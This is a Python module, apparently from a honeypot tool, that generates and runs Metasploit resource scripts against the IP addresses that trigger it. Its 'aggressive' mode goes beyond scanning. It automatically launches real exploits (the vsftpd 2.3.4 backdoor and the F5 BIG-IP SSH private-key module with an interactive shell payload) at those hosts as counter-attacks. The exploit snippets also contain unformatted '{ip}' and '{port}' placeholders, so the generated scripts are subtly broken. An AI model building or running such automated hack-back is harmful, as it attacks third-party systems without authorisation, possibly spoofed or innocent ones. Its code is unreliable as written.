"""
Metasploit Framework (MSF) controller for automated counter-measures.

Generates .rc resource scripts and manages msfconsole runs when the
honeypot detects critical attacks.
"""

import json
import logging
import os
import shlex
import subprocess
import threading
import time
from datetime import datetime, timezone
from typing import List, Optional

logger = logging.getLogger(__name__)

# ── Resource script templates ───────────────────────────────────────────

RECON_RC_TEMPLATE = """# Auto-generated by nethunter-TUI honeypot — recon
use auxiliary/scanner/portscan/tcp
set RHOSTS {ip}
set PORTS 1-1024
set TIMEOUT 500
run -j

use auxiliary/scanner/http/title
set RHOSTS {ip}
run -j

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS {ip}
run -j

sleep 5
quit
"""

AGGRESSIVE_RC_TEMPLATE = """# Auto-generated by nethunter-TUI honeypot — aggressive
use auxiliary/scanner/portscan/tcp
set RHOSTS {ip}
set PORTS 1-1024
set TIMEOUT 500
run -j

use auxiliary/scanner/http/title
set RHOSTS {ip}
run -j

use auxiliary/scanner/snmp/snmp_enum
set RHOSTS {ip}
run -j

use auxiliary/scanner/ssh/ssh_version
set RHOSTS {ip}
run -j

use auxiliary/scanner/telnet/telnet_version
set RHOSTS {ip}
run -j

{exploit_commands}
sleep 10
quit
"""


def _port_to_exploit(port: int) -> List[str]:
    """Return MSF exploit commands targeting services on *port*."""
    cmds = []
    if port in (22, 2222):
        cmds.append(
            "use exploit/linux/ssh/f5_bigip_ssh_privatekey\n"
            f"set RHOSTS {{ip}}\n"
            "set RPORT 22\n"
            "set PAYLOAD cmd/unix/interact\n"
            "run -j\n"
        )
    elif port in (21, 2121):
        cmds.append(
            "use exploit/unix/ftp/vsftpd_234_backdoor\n"
            f"set RHOSTS {{ip}}\n"
            "set RPORT 21\n"
            "run -z\n"
        )
    elif port in (80, 8080):
        cmds.append(
            "use auxiliary/scanner/http/http_version\n"
            f"set RHOSTS {{ip}}\n"
            "set RPORT {port}\nrun -j\n"
        )
    elif port in (443, 8443):
        cmds.append(
            "use auxiliary/scanner/ssl/ssl_version\n"
            f"set RHOSTS {{ip}}\n"
            "set RPORT {port}\nrun -j\n"
        )
    return cmds


class MsfController:
    """Manages Metasploit Framework counter-measures."""

    def __init__(self, scripts_dir: Optional[str] = None):
        self.scripts_dir = scripts_dir or os.path.join(
            os.path.expanduser("~"), ".nethunter", "msf_scripts"
        )
        os.makedirs(self.scripts_dir, exist_ok=True)

        self._lock = threading.Lock()
        self._running: List[subprocess.Popen] = []
        self._counter = 0

    # ── Script generation ────────────────────────────────────────────

    def _script_path(self, ip: str, level: str) -> str:
        """Return path for a new .rc script file."""
        ts = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S")
        safe_ip = ip.replace(".", "_").replace(":", "_")
        name = f"defense_{level}_{safe_ip}_{ts}.rc"
        return os.path.join(self.scripts_dir, name)

    def generate_script(self, ip: str, level: str,
                        ports: Optional[List[int]] = None) -> str:
        """Generate an .rc resource script for the given *level*.

        Returns the path to the generated script.
        """
        if level == "none":
            return ""

        exploit_lines = []
        if level == "aggressive" and ports:
            for p in ports:
                exploit_lines.extend(_port_to_exploit(p))

        if level == "aggressive":
            content = AGGRESSIVE_RC_TEMPLATE.format(
                ip=ip,
                exploit_commands="\n".join(exploit_lines) if exploit_lines else "# sleep 5\n",
            )
        else:
            content = RECON_RC_TEMPLATE.format(ip=ip)

        path = self._script_path(ip, level)
        with open(path, "w") as f:
            f.write(content)

        logger.info("Generated MSF script: %s (level=%s, ip=%s)", path, level, ip)
        return path

    # ── Execution ────────────────────────────────────────────────────

    def run_script(self, script_path: str, timeout: int = 60) -> Optional[str]:
        """Run an .rc script with msfconsole -q -r.

        Returns the captured output (truncated) or None on failure.
        Runs in a background thread.
        """
        if not os.path.exists(script_path):
            logger.warning("MSF script not found: %s", script_path)
            return None

        cmd = shlex.split(f"msfconsole -q -r {shlex.quote(script_path)}")

        try:
            proc = subprocess.Popen(
                cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                text=True,
            )
            with self._lock:
                self._running.append(proc)

            stdout, stderr = proc.communicate(timeout=timeout)

            with self._lock:
                if proc in self._running:
                    self._running.remove(proc)

            # Truncate to 2KB
            output = (stdout or "")[:2048] + (stderr or "")[:1024]
            logger.info(
                "MSF script finished: %s (rc=%d, output_len=%d)",
                script_path, proc.returncode, len(output),
            )
            return output

        except subprocess.TimeoutExpired:
            proc.kill()
            proc.wait()
            with self._lock:
                if proc in self._running:
                    self._running.remove(proc)
            logger.warning("MSF script timed out: %s", script_path)
            return None
        except FileNotFoundError:
            logger.error("msfconsole not found — install Metasploit Framework")
            return "❌ msfconsole nenalezen. Nainstaluj: apt install metasploit-framework"
        except Exception as e:
            logger.error("MSF run error: %s", e)
            return None

    def run_countermeasure(self, ip: str, level: str,
                           ports: Optional[List[int]] = None,
                           timeout: int = 90) -> Optional[str]:
        """Full pipeline: generate script, run it, return output.

        For *level* ``"none"`` this is a no-op.
        """
        if level == "none":
            return None

        script = self.generate_script(ip, level, ports)
        if not script:
            return None

        self._counter += 1
        output = self.run_script(script, timeout=timeout)
        return output

    # ── Status ───────────────────────────────────────────────────────

    def get_status(self) -> dict:
        """Return status info about the MSF controller."""
        with self._lock:
            running = len(self._running)
        return {
            "scripts_dir": self.scripts_dir,
            "total_runs": self._counter,
            "running_processes": running,
            "scripts_count": len(os.listdir(self.scripts_dir)) if os.path.isdir(self.scripts_dir) else 0,
        }

    def stop_all(self) -> None:
        """Kill any running msfconsole processes."""
        with self._lock:
            for proc in list(self._running):
                try:
                    proc.kill()
                except OSError:
                    pass
            self._running.clear()
